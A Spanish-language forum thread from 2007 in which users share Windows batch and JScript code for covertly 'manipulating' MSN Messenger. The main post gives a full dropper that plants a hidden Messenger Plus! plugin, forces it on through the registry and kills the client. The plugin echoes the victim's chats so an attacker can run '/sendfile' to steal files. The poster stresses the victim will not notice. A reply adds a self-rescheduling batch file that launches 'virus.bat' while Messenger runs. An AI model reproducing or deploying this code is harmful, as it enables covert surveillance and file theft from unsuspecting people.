Jscript + Batch. "Manipular" MSN.

Bueno, ayer boludeando se me ocurrio algo . Lo que quise hacer es bajo un script de MSN Plus! que copie todo lo que el otro dice, robar archivos, cambiar nombres, etc.

Entonces se me ocurrio crear este script, instalarlo en el MSN y activarlo.
Que se "auto instale" fue facil. Con batch creas el script .js en %programfiles%\Messenger Plus! Live\Scripts" y ya esta instalado.

Les recuerdo que %programfiles% = "X:\archivos de programa."

Ahora el problema era que este activado en cuanto se inicie el MSN, y buscando en el registro encontre la clave donde se almacenan las propiedades de los script, y cambiando esta con el batch, queda siempre activada.

En cuestion, lo que hace el batch es:

1.- Crea una carpeta en "%programfils%\Messenger Plus! Live\Scripts" llamada WML.
2.- Crea un script que copie todo lo que el otro dice en esta carpeta creada.
3.- Agrega la activacion automatica al registro.
4.- Cierra el MSN para que tenga que ser reabierto y asi aplicar los cambios.

Algo que no supe hacer, ya que no tengo casi idea de JSCRIPT es que se active SOLO el script. En cambio lo que hice fue que cuando la persona diga alguna de estas palabras:

- Hola
- Che
- q?
- qe?
- que?
- q
- qe
- que
- da

Se active el script y empezar a copiar .
Entonces es cuando el otro aprovecha esto, desactiva los comandos del MSN(Los que empiezan con "/", se desactivan en Plus! > Preferencias > Conversaciones > Desactivar la casilla "Activar comandos (Mensajes que comienzan con "/")). y empieza a escribir distintos comandos. Lo que va a pasar es que el al tenerlos desactivados no va a sufrir efectos, en cambio el que esta copiando al tenerlo, si. Con esto podemos cambiale su nick, estado, subnick, y robarle archivos. Obviamente si queremos robarle un archivo deberiamos "tildarle" la PC para que no pueda cancelar la transferencia.
Ah, y no podra detener el script a menos que lo elimine en "Plus! > preferencias > Script". Igualmente pueden agregarle una entrada para que se ejecute al iniciar windows.

O sea, una vez hecho todo, para robar archivos escribimos en el msn:

/sendfile (ruta del archivo a enviar)

(Es necesario saber el nombre y la ruta)

y empezamos a mandar muchos run.

/run www.google.com
/run www.google.com

etc, y asi sacarla de la ventana de conversacion.

En fin, el codigo es:

-----------------------------------------------------------------------------------------
   @echo off
md "%programfiles%\Messenger Plus! Live\Scripts\WML" > nul
echo var mocking = '0' >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo var melastMsg = "" >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo var thelastMsg = "" >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"

echo function OnEvent_Initialize(MessengerStart) >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo { >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo } >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"

echo function OnEvent_Uninitialize(MessengerExit) >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo { >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo } >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"

echo function OnEvent_ChatWndSendMessage(ChatWnd,Message) >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo { >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo    } >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo    if(Message == "hola") >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo    { >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo       mocking = '1' >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo    } >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"

echo    if(Message == "dpft?") >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo    { >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo       if(mocking == '0') >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo       { >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo          Interop.Call("User32.dll", "MessageBoxW", 0, "El script esta desactivado","dpft", 0); >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo       } else { >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo          Interop.Call("User32.dll", "MessageBoxW", 0, "El script esta activado","dpft", 0); >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo       } >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo    } >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"

echo    melastMsg = Message >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo
echo } >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"

echo function OnEvent_ChatWndReceiveMessage(ChatWnd,Origin, Message, MessageKind) >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo { >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo    thelastMsg = Message >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo    if (melastMsg != thelastMsg ) >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo    { >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo       if (mocking == "1") >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo       { >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo          ChatWnd.SendMessage(Message); >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo       } >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo    } >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"
echo } >> "%programfiles%\Messenger Plus! Live\Scripts\WML\WML.js"

reg add "HKEY_CURRENT_USER\Software\Patchou\Messenger Plus! Live\GlobalSettings\Scripts\WML" /v Enabled /t REG_DWORD /d 1 /f > nul

tskill msnmsgr
taskkill /im msnmsgr.exe
-----------------------------------------------------------------------------------------

Esas 4 lineas que remarque en rojo sirven para agregar palabras para activar el script. En este caso solo "hola" lo activa. Pueden modificarlo copiando las 4 lineas y pegandolas abajo de estas mismas 4 y cambiando el "hola".

Y creo que nada mas. Ah si, es una version beta, lo cree ayer, supongo que algo se podra mejorar. Y lo del JSCRIPT, alguien sabe como hacer para que se active sin necesidad de poner algo en la ventana de conversacion? :S

d.pFt.

Código:

si me ekivoco corregime

y respecto a q si se puede ejecutar un SCRIPT al solo ejecutar el msn, se puede pero deberiamos hacer un bat q este ejecutandose cada minuto hasta en contrar

con el tasklist el ejecutable dado para luego llamar a un SCRIPT weno eso es facil pero kisiera q me aclararas esta duda d q si funciona o q estoy fallando en tu JSCRIPT.js

weno salu2...

Cita de: wizard_0 en Diciembre 18, 2007, 01:21:20

No quise probrar el JSCRIPT q publicaste pero no consegui nada al abrir el msnmsgr.exe al mandar un mensaje con la palabra "hola" q deberia mandarme un mensaje no?? diciendo q el JSCRIPT esta activo !!!

aki te dejo el code q por cierto le diste una { por demas...
habia un error en la linea 17

si me ekivoco corregime

y respecto a q si se puede ejecutar un SCRIPT al solo ejecutar el msn, se puede pero deberiamos hacer un bat q este ejecutandose cada minuto hasta en contrar

con el tasklist el ejecutable dado para luego llamar a un SCRIPT weno eso es facil pero kisiera q me aclararas esta duda d q si funciona o q estoy fallando en tu JSCRIPT.js

weno salu2...

nono, cuando vos pones HOLA el script esta activo y no te avisa, es justamente lo que necesitamos asi la victima no se da cuenta que esta siendo atacada. cuando pongas "dpft?" te va a decir si esta activado o no, eso si.

Y lo de linea, tenias razon, ya lo arregle, gracias.

Tambien me habia equivocado al remarcar en rojo las 4 lineas esas, ahora esta bien.

Y lo de la duda no entendi, que duda?

dpft.

me parece curioso... lo leere mas detenidamente cuando tenga tiempo.

Weno hablo del codigo., q no deberia salir un mensaje al poner dpft?

bien ya habia visto algo asi... ojojo lastima uno espera que sea 100% batch, Embarrassed

Cita de: wizard_0 en Diciembre 18, 2007, 07:28:14

Weno hablo del codigo., q no deberia salir un mensaje al poner dpft?

si, "dpft?" te dice si esta activado o no el script. Igualmente se puede quitar, sacando las lineas correspondientes...

Weno solo kiero ver si llama a un SCRIPT ya sea .bat .sh .exe .vbs dime!!!

al escribir hola, o pdft?

y si hace eso es excelente el codigo !!! Afro

Cita de: wizard_0 en Diciembre 19, 2007, 07:35:20

Weno solo kiero ver si llama a un SCRIPT ya sea .bat .sh .exe .vbs dime!!!

al escribir hola, o pdft?

y si hace eso es excelente el codigo !!! Afro

El MSN tiene plugins en Jscript. Pueden estar desactivados o activados. En este caso va a estar activado, entonces cuando pones "hola" comienza la funcion de copiar. Y "pdft?" revisa el script y te dice si esta copiando o no.

La extension del script es .js y es el archivo al qe se llama desde el inicio de sesion, y esta en espera de que el ejecutante lo active y copie. Se ubica en "%programfiles%\Messenger Plus! Live\Scripts".

Perdon si no es eso, no te estoy entendiendo bien, o quizas vos te estas expresando bien pero yo no tengo idea. :S

Weno gracias por las molestias... Grin

lo seguire probando y analizando el codigo..

pero ahora es mi turno de colaborar...

este es el Script q hice para ejecutar un Script atraves de un ejecutable en este caso "msnmsgr.exe" siempre y cuando este este activo!!! de lo contrario no llamara al SCRIPT "virus.bat"

oz presento...

Código:

@echo off
title The power Of wizard

set name=msnmsgr.exe

set h=%time:~0,2%
set m=%time:~3,2%
set /a m=m+1

if %m% GTR 59 (
set /a h=h+1
set m=1
)

set hora=%h%:%m%
at %hora% /interactive %0

tasklist>list.txt
for /f "skip=5 tokens=1 delims= " %%a in (list.txt) do (
if %%a EQU %name% (start D:\virus.bat)
)
del list.txt
exit

Espero t sirva nos vemos...

Salu2... Afro

buenos dias, es posible mandar un archivo a la por chat es de cir como el virus foto posee el codigo de mandar archivo es asi /sendfile c:\a.txt con un script se puede mandar Huh

? gracias por su tiempo

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Agosto 07, 2008, 03:50:10 Boton Buscar